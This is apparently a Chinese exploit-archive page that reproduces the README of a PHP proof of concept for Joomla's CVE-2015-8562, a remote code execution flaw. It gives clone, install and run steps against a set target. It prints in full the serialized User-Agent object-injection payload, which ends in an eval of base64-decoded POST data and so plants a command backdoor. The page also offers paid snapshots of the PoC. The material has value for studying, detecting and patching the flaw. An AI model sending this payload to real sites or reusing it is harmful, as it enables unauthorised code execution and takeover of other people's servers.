关联漏洞
标题:
Joomla! Core 远程代码执行漏洞
(CVE-2015-8562)
描述:Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla!中存在安全漏洞。远程攻击者可借助HTTP User-Agent头利用该漏洞实施PHP对象注入攻击,执行任意PHP代码。以下版本受到影响:Joomla! 1.5.x版本,2.x版本,3.4.6之前3.x版本。(在2015年12月广泛利用)
描述
A proof of concept for Joomla's CVE-2015-8562 vulnerability
介绍
# Joomla-CVE-2015-8562-PHP-POC
A proof of concept for Joomla's CVE-2015-8562 vulnerability
## Intro
This PoC is a near 1:1 copy of Gary's python implementation hosted at [exploit-db](https://www.exploit-db.com/exploits/38977/).
## Use it
It's very easy to install:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Once composer has everything installed you'll need to change `$target` in `exploit.php`.
After that you're ready to go:
php exploit.php
### CVE-2015-8562
In December 2015 a vulnerability was found in Joomla. It allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header.
This vulnerability hit *all* versions of Joomla. A patch for v1.5.x, v2.5x and v3.x is already [released](https://github.com/joomla/joomla-cms/releases/tag/3.4.6).
If you are running PHP >= 5.4.45, >= 5.5.29 or >= 5.6.13 you are fine as this exploit also utilises [CVE-2015-6835](https://bugs.php.net/bug.php?id=70219).
Nikos Verschore from PatrolServer made a very detailed [blog post](https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/) and was a major help at understanding this vulnerability. You can use their [mini-scanner](https://scan.patrolserver.com/joomla/CVE-2015-8562) for free to check if your site is at risk.
#### The real exploit
This is what the sent `User-Agent` header looks like:
```
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}
```
文件快照
[4.0K] /data/pocs/70c0872880a9b0dee9391cacaad4791f0cf7f061
├── [ 333] composer.json
├── [1.5K] exploit.php
├── [1.1K] LICENSE
└── [2.1K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。